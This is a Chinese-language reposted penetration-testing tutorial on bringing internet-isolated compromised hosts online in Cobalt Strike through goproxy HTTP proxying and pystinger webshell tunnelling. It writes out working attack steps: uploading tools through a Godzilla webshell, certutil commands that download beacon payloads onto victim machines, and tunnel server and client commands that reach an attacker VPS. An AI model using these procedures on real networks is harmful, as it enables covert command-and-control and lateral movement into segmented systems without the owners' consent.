转载于国科漏洞社区。

前言

某个时候，在实战过程中拿到shell后，突然发现目标机器ping不通外网，没有办法走网络层协议，这时候就需要搭建不出网隧道。在本篇文章中，斗哥要送你们两个Cobalt strike上线不出网主机的实用方法。

小技巧1：

0x00 项目地址：

https://github.com/snail007/goproxy

0x01 测试环境：

攻击机（vps）：66.28.6.100
受害机1（web）：10.10.19.100(映射到66.28.5.2)
受害机2（Win10）：10.10.18.51

网络拓扑：

FW2防火墙配置如下：

保证10.10.18.51只能与10.10.19.100通信，不能与66.28.6.100通信。

0x02 goproxy http代理上线CS

先用Godzilla把goproxy项目里面的proxy.exe上传到目标机器的可读可写目录，执行以下命令在这台出网主机开启一个4444端口的HTTP服务，供后面与受害机2通讯。

proxy.exe http -t tcp -p "0.0.0.0:4444" --daemon

Cobalt strike创建监听器，有效荷载选择Windows Executable(S)，不然无法上线，然后利用Godzilla将该文件上传到web服务器供受害机2下载使用。

受害机2执行如下命令，下载CS的有效载荷。

certutil -urlcache -split -f http://10.10.19.100/goproxy_http.exe C:\Users\fujszzs\Desktop\goproxy_http.exe

受害机2执行马儿成功上线。

小技巧2：

利用pystinger上线不出网主机到Cobaltstrike

0x00.项目地址：

https://github.com/FunnyWolf/pystinger

0x01.测试环境

攻击机（vps）：66.28.6.100
受害机1（web）：10.10.19.50(映射到66.28.5.2)
受害机2（Win10）：10.10.18.50

网络拓扑：

FW2防护墙配置如下：

0x02.单主机上线方式

已控主机为单主机，不出外网且仅允许访问目标Web的80端口。

首先上传对应语言的脚本到服务器上，访问返回UTF-8表示正常。

然后继续上传stinger_server.exe到目标服务器，并执行以下命令。

start stinger_server.exe 0.0.0.0
注：作者提示不要直接运行stinger_server.exe，因为这样可能会导致TCP断连。

接着把stinger_client上传到vps下并执行以下命令。

chmod +x stinger_client
./stinger_client -w http://66.28.5.2/proxy.php -l 0.0.0.0 -p 60000

Cobalt strike设置本地监听地址（127.0.0.1）和60020端口，然后选择cs_stinger的listen发送exe或者powershell都行。

webshell执行Cobalt strike生成的马儿，成功上线，并且vps这边可以看到有数据在交互。

0x03.多主机上线方式

CobaltStrike->Listeners->Add->10.10.19.50:60020

受害机2执行如下命令，下载CS的有效载荷。

certutil -urlcache -split -f http://10.10.19.50/stingers.exe C:\Users\fujszzs\Desktop\stingers.exe

受害机1，受害机2执行马儿成功上线。

总结：

本次列举了两个小技巧，希望能帮到大家。咱们下期见！

点个在看，支持一下